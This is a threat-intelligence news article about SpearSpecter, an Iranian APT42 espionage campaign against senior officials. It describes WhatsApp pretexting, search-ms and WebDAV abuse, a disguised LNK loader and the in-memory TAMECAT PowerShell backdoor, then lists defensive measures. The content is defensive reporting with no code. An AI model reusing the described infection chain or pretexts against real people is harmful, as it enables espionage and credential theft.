Iranian Hackers Use SpearSpecter to Target Senior Government Leaders

A sophisticated Iranian cyber-espionage operation, known as SpearSpecter, is actively targeting senior government, military, and defense officials across the globe. 

The campaign is attributed to operators within Iran’s Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), an activity cluster also referred to as APT42 or CharmingCypress. 

Researchers from the Israel National Digital Agency (INDA) uncovered the ongoing operation and its associated malware tools, revealing a threat actor that blends patient social engineering with advanced technical capabilities to infiltrate high-value targets.

The Human Manipulation Behind the Campaign

SpearSpecter relies heavily on social engineering as its initial infiltration method. Attackers initiate contact through WhatsApp using persuasive pretexts such as fake conference invitations, meeting requests, or event participation. 

These communications often appear convincing because the operators invest weeks in rapport-building before delivering a malicious link. 

To widen their opportunities for compromise, APT42 has also been observed targeting victims’ family members, leveraging personal relationships to increase the likelihood of successful engagement.

How the Infection Chain Unfolds

Once sufficient trust is established, the victim receives a link to what appears to be an important document hosted on OneDrive. 

Clicking the link triggers exploitation of the Windows search-ms protocol, which prompts users to open Windows Explorer. If permitted, the system automatically connects to an attacker-controlled WebDAV server.

This WebDAV share presents a fake PDF file that is actually a malicious shortcut (LNK). When opened, it silently downloads and executes a batch script from Cloudflare Workers. 

This script loads TAMECAT, a modular PowerShell-based backdoor designed to operate exclusively in memory. 

TAMECAT communicates via multiple encrypted channels — including web traffic, Telegram, and Discord — and exfiltrates browser credentials, captures screenshots, enumerates documents, and uploads data in encrypted 5 MB segments. 

To maintain persistence, TAMECAT creates registry-based autoruns while blending into legitimate Windows processes to reduce detection.

A Persistent and Evolving Espionage Campaign

INDA’s investigation suggests that SpearSpecter has been active for months and shows no signs of slowing. 

The campaign’s reliance on fileless malware, legitimate cloud infrastructure, and personalized social engineering indicates a highly adaptive threat actor. 

These findings align with APT42’s known mission: long-term intelligence collection on individuals with access to sensitive or strategic information.

Key Defenses Against SpearSpecter Threats

Defending against the SpearSpecter campaign requires combining strong technical controls with heightened organizational awareness to counter APT42’s blend of social engineering, fileless malware, and trusted-service abuse.

• Enable strong visibility and monitoring by using PowerShell script block logging, Sysmon with SIEM forwarding, robust EDR coverage, behavioral rules aligned to APT42 TTPs, and retroactive IOC hunts for high-risk environments.
• Increase employee awareness by training staff on APT42’s realistic social engineering tactics and requiring verification of unexpected invitations, meeting requests, or document links through trusted internal contacts.
• Disable the search-ms protocol by removing its registry keys to prevent remote file-browsing malware delivery and block this increasingly abused attack vector.
• Improve network monitoring and filtering by establishing traffic baselines, alerting on deviations, and using proxies with packet inspection to detect suspicious patterns or connections to services like Telegram or Discord.
• Harden endpoints by enabling PowerShell Constrained Language Mode, AMSI, and Script Block Logging, and restricting unapproved binaries, scripts, and LNK files using privilege management tools.

Together, these measures help organizations build cyber resilience to combat emerging threats.

The SpearSpecter campaign shows APT42’s ability to blend strategic social engineering with a sophisticated PowerShell-based malware toolkit to penetrate high-value targets. 

The operation’s evolving infrastructure, stealthy infection chain, and long-term espionage focus underscore its role in Iran’s broader intelligence apparatus.  

This level of stealth and persistence underscores the need for zero-trust principles that assume breach and verify every access path.